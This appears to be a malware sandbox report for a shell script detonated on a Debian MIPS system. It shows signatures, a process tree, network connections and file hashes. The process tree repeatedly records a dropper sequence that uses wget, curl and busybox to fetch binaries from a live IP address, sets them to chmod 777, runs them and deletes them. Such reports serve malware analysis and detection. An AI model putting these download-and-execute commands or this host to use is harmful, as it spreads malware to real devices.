N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /usr/bin/curl N/A
File opened for modification /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /usr/bin/curl N/A
File opened for modification /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /usr/bin/curl N/A
File opened for modification /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A
File opened for modification /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /usr/bin/curl N/A
File opened for modification /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /usr/bin/curl N/A
File opened for modification /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /usr/bin/curl N/A
File opened for modification /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /usr/bin/curl N/A
File opened for modification /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /usr/bin/curl N/A
File opened for modification /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /usr/bin/curl N/A
File opened for modification /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /usr/bin/curl N/A

Processes

/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/chmod

[chmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

[./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/bin/rm

[rm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/wget

[wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/chmod

[chmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5

[./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/bin/rm

[rm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5]

/usr/bin/wget

[wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/chmod

[chmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP

[./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/bin/rm

[rm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP]

/usr/bin/wget

[wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/chmod

[chmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX

[./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/bin/rm

[rm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/chmod

[chmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe

[./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/bin/rm

[rm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe]

/usr/bin/wget

[wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/chmod

[chmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf

[./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/bin/rm

[rm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf]

/usr/bin/wget

[wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/chmod

[chmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0

[./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/bin/rm

[rm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0]

/usr/bin/wget

[wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/chmod

[chmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE

[./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/bin/rm

[rm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE]

/usr/bin/wget

[wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/chmod

[chmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq

[./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/bin/rm

[rm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/chmod

[chmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC

[./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/bin/rm

[rm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC]

/usr/bin/wget

[wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/chmod

[chmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH

[./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/bin/rm

[rm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/chmod

[chmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l

[./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/bin/rm

[rm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l]

/usr/bin/wget

[wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/chmod

[chmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1

[./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/bin/rm

[rm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1]

/usr/bin/wget

[wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/chmod

[chmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP

[./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/bin/rm

[rm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP]

/usr/bin/wget

[wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 02:00

Reported

2024-10-21 02:03

Platform

debian9-mipsel-20240611-en

Max time kernel

83s

Max time network

86s

Command Line

[/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC /tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC N/A
N/A /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH /tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH N/A
N/A /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l /tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l N/A
N/A /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 /tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1 N/A
N/A /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP /tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP N/A
N/A /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe /tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe N/A
N/A /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 /tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5 N/A
N/A /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP /tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP N/A
N/A /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX /tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX N/A
N/A /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe /tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe N/A
N/A /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf /tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf N/A
N/A /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 /tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0 N/A
N/A /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE /tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE N/A
N/A /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq /tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
